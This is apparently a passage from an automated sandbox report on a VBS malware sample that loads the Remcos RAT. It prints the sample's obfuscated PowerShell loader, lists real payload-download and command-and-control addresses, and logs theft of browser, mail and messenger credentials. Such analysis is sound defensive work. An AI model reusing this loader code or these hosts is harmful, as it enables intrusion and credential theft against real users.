johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers recovers rowth afhaengighedsforhold filten judaeophobia baadebyggeres large54 paaskrev skylining indskriften hackeymal juvenolatry satinforets aangstrmenes glimtets sideopdeling sorehawk vandkmmet crystallizable brummekors hyphomycetic soegetid anan observatoriers';if (${host}.currentculture) {$kbspriserne++;}function charcuteries($stamgster){$papillons=$stamgster.length-$kbspriserne;$laddered='substri';$laddered+='ng';for( $tubelike193=7;$tubelike193 -lt $papillons;$tubelike193+=8){$recovers+=$stamgster.$laddered.invoke( $tubelike193, $kbspriserne);}$recovers;}function venerator($strongbark56){ & ($verdant) ($strongbark56);}$resina=charcuteries 'suldan,munconvioc,njugazationspikursustlaabninglinseminaskuffel/hebraic5kontrol.fumarat0shi.lda kultur (pt.lonowsammensitraitornp urisydminellaobrachetwsoyledfsgaddisw forlng,ncomma.it orient ribleth1 p.trol0 baulks. skovhu0voks.nu;.lobosi pseudocw dolkesi presennamynodo6brandsk4a savem;unprote skri lxsipling6 ine,ha4 cronet;distrib benz,nmridolakiv assist:claspin1offentl2sesambo1frdiggr.formumm0,verdis)s.eetin oris.olgauditr,eusurpedccond.nskherman.oudruste/ ddsspr2wylingj0brnegaa1reveill0tr,pone0barnevo1overneu0uploop,1 kultur herlighfendothei sickanrf,rfarse svigtefbonendeouvidglixtuttern/abjudgi1hospita2wastryg1hierarc.overhea0.quabat ';$swinburnian=charcuteries 'landsdku ,treamspres.deestudie rreparat-firk ntadriftspgbaba.akeretroflnballonot mucige ';$judaeophobia=charcuteries ',dvalgsh grumphtreboteltrigsmalp e tals: udbasu/boundle/ felino1slje,sr0 sammen3sta.let.waterlo2uncoagu3cirrose7agnersn.naturfr8burnets6upro,uk. retfrd2muticou4int nda7 tragic/gal.ifoa,belfabcgiantnaipenn sid,ndenhait,appeozsnderleenic murs medi.i.unsensimgrikesas styrtfofinge,s ';$tubelike193nsuetude=charcuteries 'intercl>precont ';$verdant=charcuteries 'presancim,rgarierobotizx e serc ';$sultefden='paaskrev';$electant = charcuteries 'pu.sigeekrumbencpi tsdihtestudios,efuld w ggleh% inumssa adulteprelandspdollargdaportlaa ,paanttcappucca uty el%placoph\fiskemeapr vatin m.crobgkriminaibulletmokinlesssappetispasthmasetvangstrraastofmhyper.a.usikkerawin.berfwienervmcho,ine vanarte&tilsla,&pestram tilbagesnafuincjusterihrekur iounculti ranso ftausc.lt ';venerator (charcuteries 'plukfis$,ernekag skaftel istteloscri.enbslvt ssa sonatilvivendi:stokavspxiphop,runempiratenpou,eskruedesprintertyawnproeoverplarove,natnunderkle johanbstrsti.e= u,admi( brandsc pro enm bi.anhdepisarc fiske e/ anpa.tcnecessa special$ bl.dskebadebukloverla.e stempec ongrestidylliuaenergiknafhngectblaaste),ystifi ');venerator (charcuteries 'dockhou$,egadyng m sremlJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C2933 cpuid 8_2_240C2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_240C2264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword13_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5652, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6IJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)211
                Process Injection                		1
                Software Packing                		2
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter                		Login HookLogin Hook1
                DLL Side-Loading                		1
                Credentials In Files                		129
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets131
                Security Software Discovery                		SSH2
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials21
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture112
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467964 Sample: PAYMENT - STATEMENT ADVISE.vbs Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 13 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49705, 64544, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.32, 1999, 64545, 64546 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 64547, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        38 wab.exe 24->38         started        file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PAYMENT - STATEMENT ADVISE.vbs38%ReversingLabsScript-WScript.Trojan.GuLoader
                PAYMENT - STATEMENT ADVISE.vbs14%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                geoplugin.net1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                http://103.237.86.247/acidizes.0%Avira URL Cloudsafe
                http://103.237.86.247/acidizes.ms0%Avira URL Cloudsafe
                http://103.237.86.2470%Avira URL Cloudsafe
                http://103.237.86.247/a0%Avira URL Cloudsafe
                http://103.237.86.247/acidizes.msoXR0%Avira URL Cloudsafe
                http://103.237.86.247/mtyozjDM72.bin0%Avira URL Cloudsafe
                http://103.237.860%Avira URL Cloudsafe
                http://103.237.86.2470%VirustotalBrowse
                http://103.237.86.247/acidiz0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://103.237.86.247/mtyozjDM72.bin11%VirustotalBrowse
                http://103.237.86.247/acidizes.m0%Avira URL Cloudsafe
                http://103.2370%Avira URL Cloudsafe
                http://103.237.86.247/mtyozjDM72.binW0%Avira URL Cloudsafe
                http://103.237.0%Avira URL Cloudsafe
                http://103.237.80%Avira URL Cloudsafe
                http://103.237.86.247/acidizes.msoP0%Avira URL Cloudsafe
                https://www.google.com0%VirustotalBrowse
                http://103.20%Avira URL Cloudsafe
                https://aka.ms/pscore6lBjq0%Avira URL Cloudsafe
                http://103.2370%VirustotalBrowse
                http://103.237.80%VirustotalBrowse
                http://103.237.86.0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://103.237.86.247/acidize0%Avira URL Cloudsafe
                http://103.21%VirustotalBrowse
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://103.237H0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%VirustotalBrowse
                http://103.237.86.247/ac0%Avira URL Cloudsafe
                http://103.237.86.247/aci0%Avira URL Cloudsafe
                http://103.237.0%VirustotalBrowse
                http://www.imvu.com0%Avira URL Cloudsafe
                http://103.237.86.247/acid0%Avira URL Cloudsafe
                http://103.237.86.20%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://103.237.86.247/0%Avira URL Cloudsafe
                103.237.87.320%Avira URL Cloudsafe
                http://www.nirsoft.net/0%VirustotalBrowse
                http://www.imvu.com0%VirustotalBrowse
                http://103.237.86.240%Avira URL Cloudsafe
                https://github.com/Pester/Pester1%VirustotalBrowse
                http://103.237.86.247/acidizes0%Avira URL Cloudsafe
                http://103.237.86.247/acidizes.mso0%Avira URL Cloudsafe
                http://103.237.86.247/acidi0%Avira URL Cloudsafe
                103.237.87.321%VirustotalBrowse
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                http://103.230%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe
                http://103.237.86.247/0%VirustotalBrowse
                http://103.237.86.247/acidizes.mso11%VirustotalBrowse
                https://www.google.com/accounts/servicelogin0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.214.172
                		truefalseunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://103.237.86.247/mtyozjDM72.binfalse
                • 11%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                103.237.87.32true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/acidizes.msofalse
                • 11%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://103.237.86.247/acidizes.powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comrwab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizes.mspowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247powershell.exe, 00000002.00000002.2582058655.00000192819AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/apowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizes.msoXRpowershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizpowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.comwab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizes.mpowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/mtyozjDM72.binWwab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.8powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizes.msoPpowershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.2powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBjqpowershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizepowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
